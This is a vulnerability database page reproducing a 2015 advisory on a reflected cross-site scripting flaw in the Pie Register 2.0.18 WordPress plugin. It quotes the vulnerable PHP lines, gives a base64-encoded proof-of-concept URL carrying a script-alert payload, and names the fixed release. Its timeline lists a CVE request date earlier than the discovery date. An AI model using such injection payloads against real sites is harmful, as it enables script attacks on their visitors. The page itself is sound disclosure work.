Vulners
Lucene search
WordPress Pie Register 2.0.18 Cross Site Scripting
ποΈΒ 12 Oct 2015Β 00:00:00Reported byΒ David MooreTypeΒ 
Β packetstormπΒ packetstormsecurity.comπΒ 51Β Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | WordPress Pie Register 2.0.18 Cross Site Scripting / SQL Injection Vulnerabilities | 13 Oct 201500:00 | β | zdt |
 | CVE-2015-7377 | 9 Oct 202412:19 | β | circl |
 | WordPress Pie Register Plugin Cross-Site Scripting Vulnerability | 13 Oct 201500:00 | β | cnvd |
 | CVE-2015-7377 | 16 Oct 201520:00 | β | cve |
 | CVE-2015-7377 | 16 Oct 201520:00 | β | cvelist |
 | EUVD-2015-7301 | 7 Oct 202500:30 | β | euvd |
 | WordPress Pie-Register <2.0.19 - Cross-Site Scripting | 6 Jun 202603:01 | β | nuclei |
 | CVE-2015-7377 | 16 Oct 201520:59 | β | nvd |
 | WordPress Pie Register Cross-Site Scripting Vulnerability | 20 Oct 201500:00 | β | openvas |
 | WordPress Pie Register Plugin <= 2.0.18 - XSS | 25 Sep 201500:00 | β | patchstack |
10
`
Details
================
Software: Pie Register
Version: 2.0.18
Homepage: https://github.com/GTSolutions/Pie-Register
CVE: CVE-2015-7377 (Pending)
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)
CWE: CWE-79
Description
================
An unauthenticated reflected XSS vulnerability in Pie Register 2.0.18 allows malicious script injection via the invitaion_code parameter. Pie Register is a WordPress plugin with over 10,000 active installs.
Vulnerability
================
The vulnerability is due to the unsanitized GET parameter invitaion_code:
From: pie-register/pie-register.php:
647: $inv_code = base64_decode($_GET['invitaion_code']);
. . .
662: <h2><?php _e("Activation Code","piereg");echo " : ".$inv_code; ?></h2>
Proof of concept
================
The payload is Base64 encoded.
http://localhost/wordpress/?page=pie-register&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
Tested on Firefox 41.0 and Chrome 45.0.2454.85.
Remediation
================
Upgrade the plugin to version 2.0.19.
Timeline
================
2015-09-23: Discovered
2015-09-24: Contacted vendor via website support form
2015-08-24: Requested CVE
2015-09-28: Vendor supplied security contact email
2015-09-30: Report sent to vendor and wordpress.org
2015-10-02: Vendor releases version 2.0.19 on Github - confirmed fixed
2015-10-12: Public Disclosure
References
================
[1] http://codex.wordpress.org/Data_Validation
Discovered by
================
David Moore @grajagandev
`
Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Oct 2015 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.05825